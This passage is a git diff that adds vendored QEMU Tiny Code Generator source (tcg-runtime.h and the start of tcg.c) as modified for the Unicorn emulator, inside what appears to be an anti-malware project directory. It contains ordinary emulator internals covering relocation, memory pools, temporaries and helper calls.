b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-runtime.h new file mode 100644 index 0000000..23a0c37 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg-runtime.h @@ -0,0 +1,16 @@ +DEF_HELPER_FLAGS_2(div_i32, TCG_CALL_NO_RWG_SE, s32, s32, s32) +DEF_HELPER_FLAGS_2(rem_i32, TCG_CALL_NO_RWG_SE, s32, s32, s32) +DEF_HELPER_FLAGS_2(divu_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) +DEF_HELPER_FLAGS_2(remu_i32, TCG_CALL_NO_RWG_SE, i32, i32, i32) + +DEF_HELPER_FLAGS_2(div_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) +DEF_HELPER_FLAGS_2(rem_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) +DEF_HELPER_FLAGS_2(divu_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(remu_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) + +DEF_HELPER_FLAGS_2(shl_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(shr_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) +DEF_HELPER_FLAGS_2(sar_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) + +DEF_HELPER_FLAGS_2(mulsh_i64, TCG_CALL_NO_RWG_SE, s64, s64, s64) +DEF_HELPER_FLAGS_2(muluh_i64, TCG_CALL_NO_RWG_SE, i64, i64, i64) diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.c new file mode 100644 index 0000000..679836a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/tcg.c @@ -0,0 +1,2764 @@ +/* + * Tiny Code 
Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +/* define it to use liveness analysis (better code) */ +#define USE_LIVENESS_ANALYSIS +#define USE_TCG_OPTIMIZATIONS + +#include "config.h" + +/* Define to dump the ELF file used to communicate with GDB. */ +#undef DEBUG_JIT + +#if !defined(CONFIG_DEBUG_TCG) && !defined(NDEBUG) +/* define it to suppress various consistency checks (faster) */ +#define NDEBUG +#endif + +#include "qemu-common.h" +#include "qemu/host-utils.h" +#include "qemu/timer.h" + +/* Note: the long term plan is to reduce the dependencies on the QEMU + CPU definitions.
Currently they are used for qemu_ld/st + instructions */ +#define NO_CPU_IO_DEFS +#include "cpu.h" + +#include "tcg-op.h" + +#if UINTPTR_MAX == UINT32_MAX +# define ELF_CLASS ELFCLASS32 +#else +# define ELF_CLASS ELFCLASS64 +#endif +#ifdef HOST_WORDS_BIGENDIAN +# define ELF_DATA ELFDATA2MSB +#else +# define ELF_DATA ELFDATA2LSB +#endif + +#include "elf.h" + +/* Forward declarations for functions declared in tcg-target.c and used here. */ +static void tcg_target_init(TCGContext *s); +static void tcg_target_qemu_prologue(TCGContext *s); +static void patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend); + +/* The CIE and FDE header definitions will be common to all hosts. */ +typedef struct { + //uint32_t QEMU_ALIGN(sizeof(void *), len); + uint32_t QEMU_ALIGN(8, len); + uint32_t id; + uint8_t version; + char augmentation[1]; + uint8_t code_align; + uint8_t data_align; + uint8_t return_column; +} DebugFrameCIE; + +QEMU_PACK( typedef struct { +// uint32_t QEMU_ALIGN(sizeof(void *), len); + uint32_t QEMU_ALIGN(8, len); + uint32_t cie_offset; + uintptr_t func_start; + uintptr_t func_len; +}) DebugFrameFDEHeader; + +QEMU_PACK( typedef struct { + DebugFrameCIE cie; + DebugFrameFDEHeader fde; +}) DebugFrameHeader; + +/* Forward declarations for functions declared and used in tcg-target.c. 
*/ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str); +static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg1, + intptr_t arg2); +static void tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg); +static void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg ret, tcg_target_long arg); +static void tcg_out_op(TCGContext *s, TCGOpcode opc, const TCGArg *args, + const int *const_args); +static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg, TCGReg arg1, + intptr_t arg2); +static void tcg_out_call(TCGContext *s, tcg_insn_unit *target); +static int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct); +static void tcg_out_tb_init(TCGContext *s); +static void tcg_out_tb_finalize(TCGContext *s); + + +TCGOpDef tcg_op_defs_org[] = { +#define DEF(s, oargs, iargs, cargs, flags) { #s, oargs, iargs, cargs, iargs + oargs + cargs, flags }, +#include "tcg-opc.h" +#undef DEF +}; + +#if TCG_TARGET_INSN_UNIT_SIZE == 1 +static QEMU_UNUSED_FUNC inline void tcg_out8(TCGContext *s, uint8_t v) +{ + *s->code_ptr++ = v; +} + +static QEMU_UNUSED_FUNC inline void tcg_patch8(tcg_insn_unit *p, + uint8_t v) +{ + *p = v; +} +#endif + +#if TCG_TARGET_INSN_UNIT_SIZE <= 2 +static QEMU_UNUSED_FUNC inline void tcg_out16(TCGContext *s, uint16_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 2) { + *s->code_ptr++ = (tcg_insn_unit)v; + } else { + tcg_insn_unit *p = s->code_ptr; + memcpy(p, &v, sizeof(v)); + s->code_ptr = p + (2 / TCG_TARGET_INSN_UNIT_SIZE); + } +} + +static QEMU_UNUSED_FUNC inline void tcg_patch16(tcg_insn_unit *p, + uint16_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 2) { + *p = (tcg_insn_unit)v; + } else { + memcpy(p, &v, sizeof(v)); + } +} +#endif + +#if TCG_TARGET_INSN_UNIT_SIZE <= 4 +static QEMU_UNUSED_FUNC inline void tcg_out32(TCGContext *s, uint32_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 4) { + *s->code_ptr++ = v; + } else { + tcg_insn_unit *p = s->code_ptr; + memcpy(p, &v, 
sizeof(v)); + s->code_ptr = p + (4 / TCG_TARGET_INSN_UNIT_SIZE); + } +} + +static QEMU_UNUSED_FUNC inline void tcg_patch32(tcg_insn_unit *p, + uint32_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 4) { + *p = v; + } else { + memcpy(p, &v, sizeof(v)); + } +} +#endif + +#if TCG_TARGET_INSN_UNIT_SIZE <= 8 +static QEMU_UNUSED_FUNC inline void tcg_out64(TCGContext *s, uint64_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 8) { + *s->code_ptr++ = (tcg_insn_unit)v; + } else { + tcg_insn_unit *p = s->code_ptr; + memcpy(p, &v, sizeof(v)); + s->code_ptr = p + (8 / TCG_TARGET_INSN_UNIT_SIZE); + } +} + +static QEMU_UNUSED_FUNC inline void tcg_patch64(tcg_insn_unit *p, + uint64_t v) +{ + if (TCG_TARGET_INSN_UNIT_SIZE == 8) { + *p = (tcg_insn_unit)v; + } else { + memcpy(p, &v, sizeof(v)); + } +} +#endif + +/* label relocation processing */ + +static void tcg_out_reloc(TCGContext *s, tcg_insn_unit *code_ptr, int type, + int label_index, intptr_t addend) +{ + TCGLabel *l; + TCGRelocation *r; + + l = &s->labels[label_index]; + if (l->has_value) { + /* FIXME: This may break relocations on RISC targets that + modify instruction fields in place. The caller may not have + written the initial value. 
*/ + patch_reloc(code_ptr, type, l->u.value, addend); + } else { + /* add a new relocation entry */ + r = tcg_malloc(s, sizeof(TCGRelocation)); + r->type = type; + r->ptr = code_ptr; + r->addend = addend; + r->next = l->u.first_reloc; + l->u.first_reloc = r; + } +} + +static void tcg_out_label(TCGContext *s, int label_index, tcg_insn_unit *ptr) +{ + TCGLabel *l = &s->labels[label_index]; + intptr_t value = (intptr_t)ptr; + TCGRelocation *r; + + assert(!l->has_value); + + for (r = l->u.first_reloc; r != NULL; r = r->next) { + patch_reloc(r->ptr, r->type, value, r->addend); + } + + l->has_value = 1; + l->u.value_ptr = ptr; +} + +int gen_new_label(TCGContext *s) +{ + int idx; + TCGLabel *l; + + if (s->nb_labels >= TCG_MAX_LABELS) + tcg_abort(); + idx = s->nb_labels++; + l = &s->labels[idx]; + l->has_value = 0; + l->u.first_reloc = NULL; + return idx; +} + +#include "tcg-target.c" + +/* pool based memory allocation */ +void *tcg_malloc_internal(TCGContext *s, int size) +{ + TCGPool *p; + int pool_size; + + if (size > TCG_POOL_CHUNK_SIZE) { + /* big malloc: insert a new pool (XXX: could optimize) */ + p = g_malloc0(sizeof(TCGPool) + size); + p->size = size; + p->next = s->pool_first_large; + s->pool_first_large = p; + return p->data; + } else { + p = s->pool_current; + if (!p) { + p = s->pool_first; + if (!p) + goto new_pool; + } else { + if (!p->next) { + new_pool: + pool_size = TCG_POOL_CHUNK_SIZE; + p = g_malloc0(sizeof(TCGPool) + pool_size); + p->size = pool_size; + p->next = NULL; + if (s->pool_current) + s->pool_current->next = p; + else + s->pool_first = p; + } else { + p = p->next; + } + } + } + s->pool_current = p; + s->pool_cur = p->data + size; + s->pool_end = p->data + p->size; + return p->data; +} + +void tcg_pool_reset(TCGContext *s) +{ + TCGPool *p, *t; + for (p = s->pool_first_large; p; p = t) { + t = p->next; + g_free(p); + } + s->pool_first_large = NULL; + s->pool_cur = s->pool_end = NULL; + s->pool_current = NULL; +} + +typedef struct TCGHelperInfo { 
+ void *func; + const char *name; + unsigned flags; + unsigned sizemask; +} TCGHelperInfo; + +#include "exec/helper-proto.h" + +static const TCGHelperInfo all_helpers[] = { +#include "exec/helper-tcg.h" +}; + +void tcg_context_init(TCGContext *s) +{ + int op, total_args, n, i; + TCGOpDef *def; + TCGArgConstraint *args_ct; + int *sorted_args; + GHashTable *helper_table; + + memset(s, 0, sizeof(*s)); + s->nb_globals = 0; + + // copy original tcg_op_defs_org for private usage + s->tcg_op_defs = g_malloc(sizeof(tcg_op_defs_org)); + memcpy(s->tcg_op_defs, tcg_op_defs_org, sizeof(tcg_op_defs_org)); + + /* Count total number of arguments and allocate the corresponding + space */ + total_args = 0; + for(op = 0; op < NB_OPS; op++) { + def = &s->tcg_op_defs[op]; + n = def->nb_iargs + def->nb_oargs; + total_args += n; + } + + args_ct = g_malloc(sizeof(TCGArgConstraint) * total_args); + sorted_args = g_malloc(sizeof(int) * total_args); + + for(op = 0; op < NB_OPS; op++) { + def = &s->tcg_op_defs[op]; + def->args_ct = args_ct; + def->sorted_args = sorted_args; + n = def->nb_iargs + def->nb_oargs; + sorted_args += n; + args_ct += n; + } + + /* Register helpers. */ + /* Use g_direct_hash/equal for direct pointer comparisons on func. 
*/ + s->helpers = helper_table = g_hash_table_new(NULL, NULL); + + for (i = 0; i < ARRAY_SIZE(all_helpers); ++i) { + g_hash_table_insert(helper_table, (gpointer)all_helpers[i].func, + (gpointer)&all_helpers[i]); + } + + tcg_target_init(s); +} + +void tcg_prologue_init(TCGContext *s) +{ + /* init global prologue and epilogue */ + s->code_buf = s->code_gen_prologue; + s->code_ptr = s->code_buf; + tcg_target_qemu_prologue(s); + flush_icache_range((uintptr_t)s->code_buf, (uintptr_t)s->code_ptr); + +#ifdef DEBUG_DISAS + if (qemu_loglevel_mask(CPU_LOG_TB_OUT_ASM)) { + size_t size = tcg_current_code_size(s); + qemu_log("PROLOGUE: [size=%zu]\n", size); + qemu_log("\n"); + qemu_log_flush(); + } +#endif +} + +void tcg_set_frame(TCGContext *s, int reg, intptr_t start, intptr_t size) +{ + s->frame_start = start; + s->frame_end = start + size; + s->frame_reg = reg; +} + +void tcg_func_start(TCGContext *s) +{ + tcg_pool_reset(s); + s->nb_temps = s->nb_globals; + + /* No temps have been previously allocated for size or locality. 
*/ + memset(s->free_temps, 0, sizeof(s->free_temps)); + + s->labels = tcg_malloc(s, sizeof(TCGLabel) * TCG_MAX_LABELS); + s->nb_labels = 0; + s->current_frame_offset = s->frame_start; + +#ifdef CONFIG_DEBUG_TCG + s->goto_tb_issue_mask = 0; +#endif + + s->gen_opc_ptr = s->gen_opc_buf; + s->gen_opparam_ptr = s->gen_opparam_buf; + + s->be = tcg_malloc(s, sizeof(TCGBackendData)); +} + +static inline void tcg_temp_alloc(TCGContext *s, int n) +{ + if (n > TCG_MAX_TEMPS) + tcg_abort(); +} + +static inline int tcg_global_reg_new_internal(TCGContext *s, TCGType type, int reg, + const char *name) +{ + TCGTemp *ts; + int idx; + +#if TCG_TARGET_REG_BITS == 32 + if (type != TCG_TYPE_I32) + tcg_abort(); +#endif + if (tcg_regset_test_reg(s->reserved_regs, reg)) + tcg_abort(); + idx = s->nb_globals; + tcg_temp_alloc(s, s->nb_globals + 1); + ts = &s->temps[s->nb_globals]; + ts->base_type = type; + ts->type = type; + ts->fixed_reg = 1; + ts->reg = reg; + ts->name = name; + s->nb_globals++; + tcg_regset_set_reg(s->reserved_regs, reg); + return idx; +} + +TCGv_i32 tcg_global_reg_new_i32(TCGContext *s, int reg, const char *name) +{ + int idx; + + idx = tcg_global_reg_new_internal(s, TCG_TYPE_I32, reg, name); + return MAKE_TCGV_I32(idx); +} + +TCGv_i64 tcg_global_reg_new_i64(TCGContext *s, int reg, const char *name) +{ + int idx; + + idx = tcg_global_reg_new_internal(s, TCG_TYPE_I64, reg, name); + return MAKE_TCGV_I64(idx); +} + +static inline int tcg_global_mem_new_internal(TCGContext *s, TCGType type, int reg, + intptr_t offset, + const char *name) +{ + TCGTemp *ts; + int idx; + + idx = s->nb_globals; +#if TCG_TARGET_REG_BITS == 32 + if (type == TCG_TYPE_I64) { + char buf[64]; + tcg_temp_alloc(s, s->nb_globals + 2); + ts = &s->temps[s->nb_globals]; + ts->base_type = type; + ts->type = TCG_TYPE_I32; + ts->fixed_reg = 0; + ts->mem_allocated = 1; + ts->mem_reg = reg; +#ifdef HOST_WORDS_BIGENDIAN + ts->mem_offset = offset + 4; +#else + ts->mem_offset = offset; +#endif + pstrcpy(buf, 
sizeof(buf), name); + pstrcat(buf, sizeof(buf), "_0"); + ts->name = g_strdup(buf); + ts++; + + ts->base_type = type; + ts->type = TCG_TYPE_I32; + ts->fixed_reg = 0; + ts->mem_allocated = 1; + ts->mem_reg = reg; +#ifdef HOST_WORDS_BIGENDIAN + ts->mem_offset = offset; +#else + ts->mem_offset = offset + 4; +#endif + pstrcpy(buf, sizeof(buf), name); + pstrcat(buf, sizeof(buf), "_1"); + ts->name = g_strdup(buf); + + s->nb_globals += 2; + } else +#endif + { + tcg_temp_alloc(s, s->nb_globals + 1); + ts = &s->temps[s->nb_globals]; + ts->base_type = type; + ts->type = type; + ts->fixed_reg = 0; + ts->mem_allocated = 1; + ts->mem_reg = reg; + ts->mem_offset = offset; + ts->name = name; + s->nb_globals++; + } + return idx; +} + +TCGv_i32 tcg_global_mem_new_i32(TCGContext *s, int reg, intptr_t offset, const char *name) +{ + int idx = tcg_global_mem_new_internal(s, TCG_TYPE_I32, reg, offset, name); + return MAKE_TCGV_I32(idx); +} + +TCGv_i64 tcg_global_mem_new_i64(TCGContext *s, int reg, intptr_t offset, const char *name) +{ + int idx = tcg_global_mem_new_internal(s, TCG_TYPE_I64, reg, offset, name); + return MAKE_TCGV_I64(idx); +} + +static inline int tcg_temp_new_internal(TCGContext *s, TCGType type, int temp_local) +{ + TCGTemp *ts; + int idx, k; + + k = type + (temp_local ? TCG_TYPE_COUNT : 0); + idx = find_first_bit(s->free_temps[k].l, TCG_MAX_TEMPS); + if (idx < TCG_MAX_TEMPS) { + /* There is already an available temp with the right type. 
*/ + clear_bit(idx, s->free_temps[k].l); + + ts = &s->temps[idx]; + ts->temp_allocated = 1; + assert(ts->base_type == type); + assert(ts->temp_local == temp_local); + } else { + idx = s->nb_temps; +#if TCG_TARGET_REG_BITS == 32 + if (type == TCG_TYPE_I64) { + tcg_temp_alloc(s, s->nb_temps + 2); + ts = &s->temps[s->nb_temps]; + ts->base_type = type; + ts->type = TCG_TYPE_I32; + ts->temp_allocated = 1; + ts->temp_local = temp_local; + ts->name = NULL; + ts++; + ts->base_type = type; + ts->type = TCG_TYPE_I32; + ts->temp_allocated = 1; + ts->temp_local = temp_local; + ts->name = NULL; + s->nb_temps += 2; + } else +#endif + { + tcg_temp_alloc(s, s->nb_temps + 1); + ts = &s->temps[s->nb_temps]; + ts->base_type = type; + ts->type = type; + ts->temp_allocated = 1; + ts->temp_local = temp_local; + ts->name = NULL; + s->nb_temps++; + } + } + +#if defined(CONFIG_DEBUG_TCG) + s->temps_in_use++; +#endif + return idx; +} + +TCGv_i32 tcg_temp_new_internal_i32(TCGContext *s, int temp_local) +{ + int idx; + + idx = tcg_temp_new_internal(s, TCG_TYPE_I32, temp_local); + return MAKE_TCGV_I32(idx); +} + +TCGv_i64 tcg_temp_new_internal_i64(TCGContext *s, int temp_local) +{ + int idx; + + idx = tcg_temp_new_internal(s, TCG_TYPE_I64, temp_local); + return MAKE_TCGV_I64(idx); +} + +static void tcg_temp_free_internal(TCGContext *s, int idx) +{ + TCGTemp *ts; + int k; + +#if defined(CONFIG_DEBUG_TCG) + s->temps_in_use--; + if (s->temps_in_use < 0) { + fprintf(stderr, "More temporaries freed than allocated!\n"); + } +#endif + + assert(idx >= s->nb_globals && idx < s->nb_temps); + ts = &s->temps[idx]; + assert(ts->temp_allocated != 0); + ts->temp_allocated = 0; + + k = ts->base_type + (ts->temp_local ? 
TCG_TYPE_COUNT : 0); + set_bit(idx, s->free_temps[k].l); +} + +void tcg_temp_free_i32(TCGContext *s, TCGv_i32 arg) +{ + tcg_temp_free_internal(s, GET_TCGV_I32(arg)); +} + +void tcg_temp_free_i64(TCGContext *s, TCGv_i64 arg) +{ + tcg_temp_free_internal(s, GET_TCGV_I64(arg)); +} + +TCGv_i32 tcg_const_i32(TCGContext *s, int32_t val) +{ + TCGv_i32 t0; + t0 = tcg_temp_new_i32(s); + tcg_gen_movi_i32(s, t0, val); + return t0; +} + +TCGv_i64 tcg_const_i64(TCGContext *s, int64_t val) +{ + TCGv_i64 t0; + t0 = tcg_temp_new_i64(s); + tcg_gen_movi_i64(s, t0, val); + return t0; +} + +TCGv_i32 tcg_const_local_i32(TCGContext *s, int32_t val) +{ + TCGv_i32 t0; + t0 = tcg_temp_local_new_i32(s); + tcg_gen_movi_i32(s, t0, val); + return t0; +} + +TCGv_i64 tcg_const_local_i64(TCGContext *s, int64_t val) +{ + TCGv_i64 t0; + t0 = tcg_temp_local_new_i64(s); + tcg_gen_movi_i64(s, t0, val); + return t0; +} + +#if defined(CONFIG_DEBUG_TCG) +void tcg_clear_temp_count(TCGContext *s) +{ + s->temps_in_use = 0; +} + +int tcg_check_temp_count(TCGContext *s) +{ + if (s->temps_in_use) { + /* Clear the count so that we don't give another + * warning immediately next time around. + */ + s->temps_in_use = 0; + return 1; + } + return 0; +} +#endif + +/* Note: we convert the 64 bit args to 32 bit and do some alignment + and endian swap. Maybe it would be better to do the alignment + and endian swap in tcg_reg_alloc_call(). */ +void tcg_gen_callN(TCGContext *s, void *func, TCGArg ret, + int nargs, TCGArg *args) +{ + int i, real_args, nb_rets; + unsigned sizemask, flags; + TCGArg *nparam; + TCGHelperInfo *info; + + info = g_hash_table_lookup(s->helpers, (gpointer)func); + flags = info->flags; + sizemask = info->sizemask; + +#if defined(__sparc__) && !defined(__arch64__) \ + && !defined(CONFIG_TCG_INTERPRETER) + /* We have 64-bit values in one register, but need to pass as two + separate parameters. Split them. 
*/ + int orig_sizemask = sizemask; + int orig_nargs = nargs; + TCGv_i64 retl, reth; + + TCGV_UNUSED_I64(retl); + TCGV_UNUSED_I64(reth); + if (sizemask != 0) { + TCGArg *split_args = __builtin_alloca(sizeof(TCGArg) * nargs * 2); + for (i = real_args = 0; i < nargs; ++i) { + int is_64bit = sizemask & (1 << (i+1)*2); + if (is_64bit) { + TCGv_i64 orig = MAKE_TCGV_I64(args[i]); + TCGv_i32 h = tcg_temp_new_i32(s); + TCGv_i32 l = tcg_temp_new_i32(s); + tcg_gen_extr_i64_i32(l, h, orig); + split_args[real_args++] = GET_TCGV_I32(h); + split_args[real_args++] = GET_TCGV_I32(l); + } else { + split_args[real_args++] = args[i]; + } + } + nargs = real_args; + args = split_args; + sizemask = 0; + } +#elif defined(TCG_TARGET_EXTEND_ARGS) && TCG_TARGET_REG_BITS == 64 + for (i = 0; i < nargs; ++i) { + int is_64bit = sizemask & (1 << (i+1)*2); + int is_signed = sizemask & (2 << (i+1)*2); + if (!is_64bit) { + TCGv_i64 temp = tcg_temp_new_i64(s); + TCGv_i64 orig = MAKE_TCGV_I64(args[i]); + if (is_signed) { + tcg_gen_ext32s_i64(s, temp, orig); + } else { + tcg_gen_ext32u_i64(s, temp, orig); + } + args[i] = GET_TCGV_I64(temp); + } + } +#endif /* TCG_TARGET_EXTEND_ARGS */ + + *s->gen_opc_ptr++ = INDEX_op_call; + nparam = s->gen_opparam_ptr++; + if (ret != TCG_CALL_DUMMY_ARG) { +#if defined(__sparc__) && !defined(__arch64__) \ + && !defined(CONFIG_TCG_INTERPRETER) + if (orig_sizemask & 1) { + /* The 32-bit ABI is going to return the 64-bit value in + the %o0/%o1 register pair. Prepare for this by using + two return temporaries, and reassemble below. 
*/ + retl = tcg_temp_new_i64(s); + reth = tcg_temp_new_i64(s); + *s->gen_opparam_ptr++ = GET_TCGV_I64(reth); + *s->gen_opparam_ptr++ = GET_TCGV_I64(retl); + nb_rets = 2; + } else { + *s->gen_opparam_ptr++ = ret; + nb_rets = 1; + } +#else + if (TCG_TARGET_REG_BITS < 64 && (sizemask & 1)) { +#ifdef HOST_WORDS_BIGENDIAN + *s->gen_opparam_ptr++ = ret + 1; + *s->gen_opparam_ptr++ = ret; +#else + *s->gen_opparam_ptr++ = ret; + *s->gen_opparam_ptr++ = ret + 1; +#endif + nb_rets = 2; + } else { + *s->gen_opparam_ptr++ = ret; + nb_rets = 1; + } +#endif + } else { + nb_rets = 0; + } + real_args = 0; + for (i = 0; i < nargs; i++) { + int is_64bit = sizemask & (1 << (i+1)*2); + if (TCG_TARGET_REG_BITS < 64 && is_64bit) { +#ifdef TCG_TARGET_CALL_ALIGN_ARGS + /* some targets want aligned 64 bit args */ + if (real_args & 1) { + *s->gen_opparam_ptr++ = TCG_CALL_DUMMY_ARG; + real_args++; + } +#endif + /* If stack grows up, then we will be placing successive + arguments at lower addresses, which means we need to + reverse the order compared to how we would normally + treat either big or little-endian. For those arguments + that will wind up in registers, this still works for + HPPA (the only current STACK_GROWSUP target) since the + argument registers are *also* allocated in decreasing + order. If another such target is added, this logic may + have to get more complicated to differentiate between + stack arguments and register arguments. 
*/ +#if defined(HOST_WORDS_BIGENDIAN) != defined(TCG_TARGET_STACK_GROWSUP) + *s->gen_opparam_ptr++ = args[i] + 1; + *s->gen_opparam_ptr++ = args[i]; +#else + *s->gen_opparam_ptr++ = args[i]; + *s->gen_opparam_ptr++ = args[i] + 1; +#endif + real_args += 2; + continue; + } + + *s->gen_opparam_ptr++ = args[i]; + real_args++; + } + *s->gen_opparam_ptr++ = (uintptr_t)func; + *s->gen_opparam_ptr++ = flags; + + *nparam = (nb_rets << 16) | real_args; + + /* total parameters, needed to go backward in the instruction stream */ + *s->gen_opparam_ptr++ = 1 + nb_rets + real_args + 3; + +#if defined(__sparc__) && !defined(__arch64__) \ + && !defined(CONFIG_TCG_INTERPRETER) + /* Free all of the parts we allocated above. */ + for (i = real_args = 0; i < orig_nargs; ++i) { + int is_64bit = orig_sizemask & (1 << (i+1)*2); + if (is_64bit) { + TCGv_i32 h = MAKE_TCGV_I32(args[real_args++]); + TCGv_i32 l = MAKE_TCGV_I32(args[real_args++]); + tcg_temp_free_i32(s, h); + tcg_temp_free_i32(s, l); + } else { + real_args++; + } + } + if (orig_sizemask & 1) { + /* The 32-bit ABI returned two 32-bit pieces. Re-assemble them. + Note that describing these as TCGv_i64 eliminates an unnecessary + zero-extension that tcg_gen_concat_i32_i64 would create. 
*/ + tcg_gen_concat32_i64(MAKE_TCGV_I64(ret), retl, reth); + tcg_temp_free_i64(s, retl); + tcg_temp_free_i64(s, reth); + } +#elif defined(TCG_TARGET_EXTEND_ARGS) && TCG_TARGET_REG_BITS == 64 + for (i = 0; i < nargs; ++i) { + int is_64bit = sizemask & (1 << (i+1)*2); + if (!is_64bit) { + TCGv_i64 temp = MAKE_TCGV_I64(args[i]); + tcg_temp_free_i64(s, temp); + } + } +#endif /* TCG_TARGET_EXTEND_ARGS */ +} + +#if TCG_TARGET_REG_BITS == 32 +void tcg_gen_shifti_i64(TCGContext *s, TCGv_i64 ret, TCGv_i64 arg1, + int c, int right, int arith) +{ + if (c == 0) { + tcg_gen_mov_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1)); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1)); + } else if (c >= 32) { + c -= 32; + if (right) { + if (arith) { + tcg_gen_sari_i32(s, TCGV_LOW(ret), TCGV_HIGH(arg1), c); + tcg_gen_sari_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), 31); + } else { + tcg_gen_shri_i32(s, TCGV_LOW(ret), TCGV_HIGH(arg1), c); + tcg_gen_movi_i32(s, TCGV_HIGH(ret), 0); + } + } else { + tcg_gen_shli_i32(s, TCGV_HIGH(ret), TCGV_LOW(arg1), c); + tcg_gen_movi_i32(s, TCGV_LOW(ret), 0); + } + } else { + TCGv_i32 t0, t1; + + t0 = tcg_temp_new_i32(s); + t1 = tcg_temp_new_i32(s); + if (right) { + tcg_gen_shli_i32(s, t0, TCGV_HIGH(arg1), 32 - c); + if (arith) + tcg_gen_sari_i32(s, t1, TCGV_HIGH(arg1), c); + else + tcg_gen_shri_i32(s, t1, TCGV_HIGH(arg1), c); + tcg_gen_shri_i32(s, TCGV_LOW(ret), TCGV_LOW(arg1), c); + tcg_gen_or_i32(s, TCGV_LOW(ret), TCGV_LOW(ret), t0); + tcg_gen_mov_i32(s, TCGV_HIGH(ret), t1); + } else { + tcg_gen_shri_i32(s, t0, TCGV_LOW(arg1), 32 - c); + /* Note: ret can be the same as arg1, so we use t1 */ + tcg_gen_shli_i32(s, t1, TCGV_LOW(arg1), c); + tcg_gen_shli_i32(s, TCGV_HIGH(ret), TCGV_HIGH(arg1), c); + tcg_gen_or_i32(s, TCGV_HIGH(ret), TCGV_HIGH(ret), t0); + tcg_gen_mov_i32(s, TCGV_LOW(ret), t1); + } + tcg_temp_free_i32(s, t0); + tcg_temp_free_i32(s, t1); + } +} +#endif + +static inline TCGMemOp tcg_canonicalize_memop(TCGMemOp op, bool is64, bool st) +{ + switch (op & 
MO_SIZE) { + case MO_8: + op &= ~MO_BSWAP; + break; + case MO_16: + break; + case MO_32: + if (!is64) { + op &= ~MO_SIGN; + } + break; + case MO_64: + if (!is64) { + tcg_abort(); + } + break; + } + if (st) { + op &= ~MO_SIGN; + } + return op; +} + +// Unicorn engine +// check if the last memory access was invalid +// if so, we jump to the block epilogue to quit immediately. +void check_exit_request(TCGContext *tcg_ctx) +{ + TCGv_i32 flag; + + flag = tcg_temp_new_i32(tcg_ctx); + tcg_gen_ld_i32(tcg_ctx, flag, tcg_ctx->cpu_env, + offsetof(CPUState, tcg_exit_req) - ENV_OFFSET); + tcg_gen_brcondi_i32(tcg_ctx, TCG_COND_NE, flag, 0, tcg_ctx->exitreq_label); + tcg_temp_free_i32(tcg_ctx, flag); +} + +void tcg_gen_qemu_ld_i32(struct uc_struct *uc, TCGv_i32 val, TCGv addr, TCGArg idx, TCGMemOp memop) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + memop = tcg_canonicalize_memop(memop, 0, 0); + + *tcg_ctx->gen_opc_ptr++ = INDEX_op_qemu_ld_i32; + tcg_add_param_i32(tcg_ctx, val); + tcg_add_param_tl(tcg_ctx, addr); + *tcg_ctx->gen_opparam_ptr++ = memop; + *tcg_ctx->gen_opparam_ptr++ = idx; + + check_exit_request(tcg_ctx); +} + +void tcg_gen_qemu_st_i32(struct uc_struct *uc, TCGv_i32 val, TCGv addr, TCGArg idx, TCGMemOp memop) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + memop = tcg_canonicalize_memop(memop, 0, 1); + + *tcg_ctx->gen_opc_ptr++ = INDEX_op_qemu_st_i32; + tcg_add_param_i32(tcg_ctx, val); + tcg_add_param_tl(tcg_ctx, addr); + *tcg_ctx->gen_opparam_ptr++ = memop; + *tcg_ctx->gen_opparam_ptr++ = idx; + + check_exit_request(tcg_ctx); +} + +void tcg_gen_qemu_ld_i64(struct uc_struct *uc, TCGv_i64 val, TCGv addr, TCGArg idx, TCGMemOp memop) +{ + TCGContext *tcg_ctx = uc->tcg_ctx; + + 